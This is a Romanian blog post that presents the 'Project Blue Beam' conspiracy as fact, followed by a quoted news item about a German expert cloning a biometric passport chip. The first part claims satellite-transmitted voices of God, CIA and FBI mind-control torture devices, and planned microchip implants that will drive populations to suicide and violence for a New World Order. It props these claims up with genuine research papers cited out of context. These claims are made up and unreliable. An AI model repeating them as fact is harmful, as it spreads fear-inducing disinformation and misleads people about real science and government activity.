Existenţa unor astfel de tehnologii ţine de a treia direcţie de dezvoltare a proiectului Blue Beam care vizează comunicarea telepatică şi electromagnetică prin unde de joasă, foarte joasă şi extrem de joasă frecvenţă care îi va face pe oameni să creadă că îl aud pe propriul lor Dumnezeu vorbindu-le. Astfel de unde generate de computer vor fi transmise prin intermediul sateliţilor şi vor interacţiona cu gândirea naturală, făcând să apară ceea ce se numeşte „vorbire artificială”. Acest gen de tehnologie există încă din anii ‘70 şi a fost perfecţionată prin cercetări ulterioare privind relaţia dintre creierul uman şi computer.
În ianuarie 1991 la Universitatea din Arizona a avut loc conferinţa intitulată „Cercetarea avansată NATO cu privire la fenomene emergente ale sistemelor biomoleculare”. Ce înseamnă aceasta mai exact? Într-una din lucrările prezentate la această conferinţă erau prezentate echipamente care puteau face un orb să vadă sau un surd să audă. Echipamente care puteau calma orice durere, fără a interveni cu medicamente şi a căror utilizare ar fi permis oricărei fiinţe umane să îşi menţină şi la vârste înaintate aceleaşi funcţii de la tinereţe. Autorul lucrării în cauză trăgea un semnal de alarmă asupra pericolului ca astfel de cercetări să fie deturnate de la scopul lor iniţial şi să fie folosite împotriva oamenilor. El afirma că astfel de echipamente sunt operaţionale în cadrul CIA şi FBI, nu pentru a vindeca oameni, ci pentru a tortura şi omorî pe cei care se opun sistemului sau pentru a crea ceea ce în mod obişnuit se numeşte „candidat manciurian”.
...
Agenţiile guvernamentale şi corporaţiile care lucrează mână în mână cu ele sunt gata să facă orice pentru a-şi atinge obiectivul: controlul social total. De ce? Foarte simplu. În primul rând, dacă terorizezi populaţia şi o faci să se teamă pentru siguranţa şi viaţa sa, îţi va fi mai uşor să implementezi un sistem draconic, să o supraveghezi, să o dezarmezi şi apoi să îi spui că totul este pentru protecţia ei. În al doilea rând pentru că aşa este mai uşor să promovezi un nou sistem politic şi social, în locul celui vechi care pare să nu mai funcţioneze. Evident că alternativa este pregătită de multă vreme şi se numeşte Noua Ordine Mondială

....
Dovezi ale existenţei tehnologiei pentru control mental
„Tehnologia ce urmează a fi utilizată pentru controlul minţii în Proiectul Blue Beam include un transmiţător care emite pe frecvenţa sistemului nervos uman. El a fost deja produs de firma Laurel Electro-Optical System din Pasadena, California. Laurel este unul dintre colaboratorii apropiaţi ai Aviaţiei Americane şi a lucrat mult în domeniul construirii unor arme care să implementeze mesajul direct în mintea inamicului.
...
Dovezi despre existenţa unor astfel de tehnologii există inclusiv în publicaţii ale Departamentului American al Apărării. Căpitanul Paul E. Tyler semnează o lucrare având ca titlu „The electromagnetic spectrum and low intensity conflict” (Spectrul electromagnetic şi conflictul de intensitate joasă) inclusă în colecţia „Low intensity conflict in modern technology” (Conflictul de joasă intensitate în tehnologia modernă) publicată în 1986 de Air University Press, Maxwell Air Force Base, Alabama. Aici se vorbeşte despre microunde care generează senzaţii auditive care pot fi auzite doar de individul ţintă. ....
Şi James Lin explica în 1978 în cartea sa intitulată „Microwave Auditory Effect and Application” (Efectul auditiv al microundelor şi aplicarea lui) cum poate fi auzită o voce transmisă direct către creier fără a exista o vibraţie sonoră.
...
„Scopul este să fie anihilată orice formă de opoziţie faţă de Noua Ordine Mondială. Utilizând tehnologiile despre care am vorbit mai sus undele generatoare de gânduri vor putea fi transmise prin reţelele de fibre optice, cabluri TV, linii telefonice şi vor pătrunde în orice echipament care conţine microcipuri. La acel moment procesul de implantare al microcipurilor la nivelul populaţiei va fi realizat, astfel încât oamenii vor putea fi uşor împinşi la un val de sinucideri, violenţe şi nebunie.
Am fost întrebat de multe ori când se vor petrece toate acestea. După ce va fi creată o criză economică, care îi va forţa pe oameni să îşi cheltuiască toate rezervele de bani. Apoi va fi implementat un sistem planetar de plăţi electronice astfel încât nimeni să nu poată supravieţui în afara lui. După atâtea dezastre omenirea va fi gata să implore apariţia unui salvator care să restabilească pacea cu orice preţ, chiar cu preţul propriei libertăţi. Un principiu similar a fost aplicat în URSS pentru instalarea comunismului.”

~~~~~~###########################################~~~~~~~~~~~~~~~~~~~~~~~

"Germania a fost prima ţară din Uniunea Europeană care a introdus paşaportul biometric securizat - ePass, care conţine un cip electronic în locul fotografiei de identitate pentru a face mai dificilă falsificarea, din luna martie 2007 conţinând şi înregistrarea amprentelor digitale. Însă ePass-ul nu este de nefalsificat, acest lucru fiind realizat de un expert german în mai puţin de două săptămâni, doar cu ajutorul unui echipament cumpărat de pe Internet cu 200 de dolari.Într-o conferinţă susţinută la Las Vegas în 2006, Lukas Grunwald a arătat că informaţiile personale stocate pe aceste documente pot fi copiate şi transferate pe alte cipuri, folosind doar informaţiile publice postate pe pagina de Internet a Organizaţiei Internaţionale de Aviaţie Civilă, un organism al ONU ce a dezvoltat acest standard. "Din punctul meu de vedere, toate aceste paşapoarte biometrice sunt o enormă risipă de bani - ele nu asigură deloc o securitate mai bună", a spus atunci Grunwald.Deocamdată, germanul a reuşit doar clonarea unui cip şi aplicarea lui pe un paşaport nou, fals care poate fi descoperit, la o simplă verificare a operatorului de la graniţă.Printre ţările afectate de descoperirea germanului se numără Marea Britanie, care dezvoltă un proiect de producere a paşapoartelor biometrice şi a cardurilor de identitate în valoare de 415 milioane de lire sterline, care include nu numai paşapoartele biometrice, dar şi Statele Unite, Belgia, Suedia şi Franţa."

Niciun comentariu:

Trimiteți un comentariu